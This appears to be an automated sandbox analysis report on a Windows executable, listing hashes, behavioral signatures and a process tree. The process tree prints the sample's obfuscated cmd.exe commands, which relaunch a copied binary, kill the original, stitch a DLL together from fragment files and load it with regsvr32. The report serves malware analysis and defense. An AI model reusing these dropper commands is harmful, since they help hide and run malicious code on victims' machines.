Analysis
-
max time kernel
88s -
max time network
74s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
20-01-2025 09:15
Static task
static1
Behavioral task
behavioral1
Sample
78a74ea4f8dc7a468ba1fcfeaeef24b17eea9bbbedfe897ec7cf02c1e60c3e61.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
78a74ea4f8dc7a468ba1fcfeaeef24b17eea9bbbedfe897ec7cf02c1e60c3e61.exe
Resource
win10v2004-20241007-en
General
-
Target
78a74ea4f8dc7a468ba1fcfeaeef24b17eea9bbbedfe897ec7cf02c1e60c3e61.exe
-
Size
2.0MB
-
MD5
0ead280a3e08ff34bee62fcc9cf0a53f
-
SHA1
8c001de69521a96da77c512fa6742bb3fefcda7d
-
SHA256
78a74ea4f8dc7a468ba1fcfeaeef24b17eea9bbbedfe897ec7cf02c1e60c3e61
-
SHA512
047d7d5ef85d6d4ffb1ccf53e2696153ddd6bed38484743c9c4454a0cdcd51934912ebdee2a9de390cc35f8b7db1ecfaa6a2c3d358a92d8a5aae6a63e349b45b
-
SSDEEP
49152:N2nvdBTU7QFQP+ENo53Ip737cp3+BbQ8V+jW1aMibv:AvzWB7NYIp7349+BbB+jWIv
Malware Config
Signatures
-
Executes dropped EXE 2 IoCs
pid Process 2272 ZamAC7VNr~i2uF.eXe 2736 f77f151.exe -
Loads dropped DLL 11 IoCs
pid Process 1720 cmd.exe 2072 regsvr32.exe 2072 regsvr32.exe 2072 regsvr32.exe 2072 regsvr32.exe 2072 regsvr32.exe 816 WerFault.exe 816 WerFault.exe 816 WerFault.exe 816 WerFault.exe 816 WerFault.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 816 2736 WerFault.exe 43 -
System Location Discovery: System Language Discovery 1 TTPs 10 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regsvr32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f77f151.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 78a74ea4f8dc7a468ba1fcfeaeef24b17eea9bbbedfe897ec7cf02c1e60c3e61.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ZamAC7VNr~i2uF.eXe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Kills process with taskkill 1 IoCs
pid Process 2264 taskkill.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2072 regsvr32.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2264 taskkill.exe -
Suspicious use of WriteProcessMemory 43 IoCs
description pid Process procid_target PID 2204 wrote to memory of 1720 2204 78a74ea4f8dc7a468ba1fcfeaeef24b17eea9bbbedfe897ec7cf02c1e60c3e61.exe 28 PID 2204 wrote to memory of 1720 2204 78a74ea4f8dc7a468ba1fcfeaeef24b17eea9bbbedfe897ec7cf02c1e60c3e61.exe 28 PID 2204 wrote to memory of 1720 2204 78a74ea4f8dc7a468ba1fcfeaeef24b17eea9bbbedfe897ec7cf02c1e60c3e61.exe 28 PID 2204 wrote to memory of 1720 2204 78a74ea4f8dc7a468ba1fcfeaeef24b17eea9bbbedfe897ec7cf02c1e60c3e61.exe 28 PID 1720 wrote to memory of 2272 1720 cmd.exe 30 PID 1720 wrote to memory of 2272 1720 cmd.exe 30 PID 1720 wrote to memory of 2272 1720 cmd.exe 30 PID 1720 wrote to memory of 2272 1720 cmd.exe 30 PID 1720 wrote to memory of 2264 1720 cmd.exe 31 PID 1720 wrote to memory of 2264 1720 cmd.exe 31 PID 1720 wrote to memory of 2264 1720 cmd.exe 31 PID 1720 wrote to memory of 2264 1720 cmd.exe 31 PID 2272 wrote to memory of 2300 2272 ZamAC7VNr~i2uF.eXe 32 PID 2272 wrote to memory of 2300 2272 ZamAC7VNr~i2uF.eXe 32 PID 2272 wrote to memory of 2300 2272 ZamAC7VNr~i2uF.eXe 32 PID 2272 wrote to memory of 2300 2272 ZamAC7VNr~i2uF.eXe 32 PID 2272 wrote to memory of 1748 2272 ZamAC7VNr~i2uF.eXe 35 PID 2272 wrote to memory of 1748 2272 ZamAC7VNr~i2uF.eXe 35 PID 2272 wrote to memory of 1748 2272 ZamAC7VNr~i2uF.eXe 35 PID 2272 wrote to memory of 1748 2272 ZamAC7VNr~i2uF.eXe 35 PID 1748 wrote to memory of 1976 1748 cmd.exe 37 PID 1748 wrote to memory of 1976 1748 cmd.exe 37 PID 1748 wrote to memory of 1976 1748 cmd.exe 37 PID 1748 wrote to memory of 1976 1748 cmd.exe 37 PID 1748 wrote to memory of 2332 1748 cmd.exe 38 PID 1748 wrote to memory of 2332 1748 cmd.exe 38 PID 1748 wrote to memory of 2332 1748 cmd.exe 38 PID 1748 wrote to memory of 2332 1748 cmd.exe 38 PID 1748 wrote to memory of 2072 1748 cmd.exe 39 PID 1748 wrote to memory of 2072 1748 cmd.exe 39 PID 1748 wrote to memory of 2072 1748 cmd.exe 39 PID 1748 wrote to memory of 2072 1748 cmd.exe 39 PID 1748 wrote to memory of 2072 1748 cmd.exe 39 PID 1748 wrote to memory of 2072 1748 cmd.exe 39 PID 1748 wrote to memory of 2072 1748 cmd.exe 39 PID 2072 wrote to memory of 2736 2072 regsvr32.exe 43 PID 2072 wrote to memory of 2736 2072 regsvr32.exe 43 PID 2072 wrote to memory of 2736 2072 regsvr32.exe 43 PID 2072 wrote to memory of 2736 2072 regsvr32.exe 43 PID 2736 wrote to memory of 816 2736 f77f151.exe 44 PID 2736 wrote to memory of 816 2736 f77f151.exe 44 PID 2736 wrote to memory of 816 2736 f77f151.exe 44 PID 2736 wrote to memory of 816 2736 f77f151.exe 44
Processes
-
C:\Users\Admin\AppData\Local\Temp\78a74ea4f8dc7a468ba1fcfeaeef24b17eea9bbbedfe897ec7cf02c1e60c3e61.exe"C:\Users\Admin\AppData\Local\Temp\78a74ea4f8dc7a468ba1fcfeaeef24b17eea9bbbedfe897ec7cf02c1e60c3e61.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2204 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C COpY /Y"C:\Users\Admin\AppData\Local\Temp\78a74ea4f8dc7a468ba1fcfeaeef24b17eea9bbbedfe897ec7cf02c1e60c3e61.exe" ..\ZamAC7VNr~i2uF.eXe > nUL && Start ..\ZAmAC7vNr~i2uF.eXE -po0TK~LTdWE2nXBqcFAGZqLa & if "" == ""for %X In ( "C:\Users\Admin\AppData\Local\Temp\78a74ea4f8dc7a468ba1fcfeaeef24b17eea9bbbedfe897ec7cf02c1e60c3e61.exe") do taskkill /im "%~NXX" /F > nUL2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1720 -
C:\Users\Admin\AppData\Local\Temp\ZamAC7VNr~i2uF.eXe..\ZAmAC7vNr~i2uF.eXE -po0TK~LTdWE2nXBqcFAGZqLa3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2272 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C COpY /Y"C:\Users\Admin\AppData\Local\Temp\ZamAC7VNr~i2uF.eXe" ..\ZamAC7VNr~i2uF.eXe > nUL && Start ..\ZAmAC7vNr~i2uF.eXE -po0TK~LTdWE2nXBqcFAGZqLa & if "-po0TK~LTdWE2nXBqcFAGZqLa " == ""for %X In ( "C:\Users\Admin\AppData\Local\Temp\ZamAC7VNr~i2uF.eXe") do taskkill /im "%~NXX" /F > nUL4⤵
- System Location Discovery: System Language Discovery
PID:2300
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ecHo h%Time%BmguLC:\Users\Admin\AppData\Local\TempU7k%Cd%qi%Cd%08jLy%rANDom%I79C>BSNd.E0I & ecHO|seT /p = "MZ" > YO~XCVJS.miu & cOPY /Y /b Yo~xCVJS.MiU + ldZpT.u + 2B7b.THK + O79G.NW+ 7DOCE1.SU_ +BSNd.E0I ..\n~qYw._IC > nuL& DEl /Q *> NUL& StaRT regsvr32 /S ..\N~qYW._IC -u4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1748 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" ecHO"5⤵
- System Location Discovery: System Language Discovery
PID:1976
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" seT /p = "MZ" 1>YO~XCVJS.miu"5⤵
- System Location Discovery: System Language Discovery
PID:2332
-
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 /S ..\N~qYW._IC -u5⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2072 -
C:\Users\Admin\AppData\Local\Temp\f77f151.exe"C:\Users\Admin\AppData\Local\Temp\f77f151.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2736 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2736 -s 5327⤵
- Loads dropped DLL
- Program crash
PID:816
-
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "78a74ea4f8dc7a468ba1fcfeaeef24b17eea9bbbedfe897ec7cf02c1e60c3e61.exe" /F3⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2264
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
393KB
MD54b9e46165a55d8876d0e85cac6282775
SHA1103045f664b16fb1e51fd127dcefc6d5a5ba8e70
SHA2562fe223befa1178489b046a44253c6f88c8f7b73b9374c2309377c46bf1d4a819
SHA5123f495bed08516ed670b8877e497b5044a2bb379b8eacd34ce7539ca3d108b7cd348d1a6be39b4d1790b724eb3b02b90282023e6c76037701be5d0fbe6f45b869
-
Filesize
2B
MD5ac6ad5d9b99757c3a878f2d275ace198
SHA1439baa1b33514fb81632aaf44d16a9378c5664fc
SHA2569b8db510ef42b8ed54a3712636fda55a4f8cfcd5493e20b74ab00cd4f3979f2d
SHA512bfcdcb26b6f0c288838da7b0d338c2af63798a2ece9dcd6bc07b7cadf44477e3d5cfbba5b72446c61a1ecf74a0bccc62894ea87a40730cd1d4c2a3e15a7bb55b
-
Filesize
73KB
MD5c0a777e2eee4a3c706a2a05f94c0a87e
SHA1ad55bc9e6893b871d368b5e9f16636945e8b038d
SHA2562a5511aa2c973586bdb6930a817bb94832329f7b30168388896c103f4172bfc2
SHA5124e37828f444436ef161dfed5c7f858a9ea6ff23c68c27bb7c5064e4d5b31a8002dfdd1a68ac08528246c6ff869a0c4380dae22bb3d738d2e1f1391f3ec99e594
-
Filesize
1.0MB
MD5a2cc505f8d5a2efa58dad23fb5b08c9b
SHA130eb4ab5b81259eef3514f3d9c6f9a0b066e4a89
SHA2564f4a847a0559960c6d29acc91fe5b1a649964d781a255670f025e32990a1ed6b
SHA512b38fcadc35ba9e0b401f2b2df1077bb3b15e504b18c4a9657cbc4ca01de706f3def36659dfb03f072841d12ac522e66748ca505c961bac15bcedc7399277e527
-
Filesize
2.0MB
MD50ead280a3e08ff34bee62fcc9cf0a53f
SHA18c001de69521a96da77c512fa6742bb3fefcda7d
SHA25678a74ea4f8dc7a468ba1fcfeaeef24b17eea9bbbedfe897ec7cf02c1e60c3e61
SHA512047d7d5ef85d6d4ffb1ccf53e2696153ddd6bed38484743c9c4454a0cdcd51934912ebdee2a9de390cc35f8b7db1ecfaa6a2c3d358a92d8a5aae6a63e349b45b
-
Filesize
21KB
MD5858939a54a0406e5be7220b92b6eb2b3
SHA1da24c0b6f723a74a8ec59e58c9c0aea3e86b7109
SHA256a30f30a109cb78d5eb1969f6c13f01a1e0a5f07b7ad8b133f5d2616223c1ce0a
SHA5128875d1e43ea59314695747796894a2f171e92f7b04024dbc529af1497331489e279cd06ea03061288089d2f07ad437178b9d62f0bae2e16ae0b95c5681569401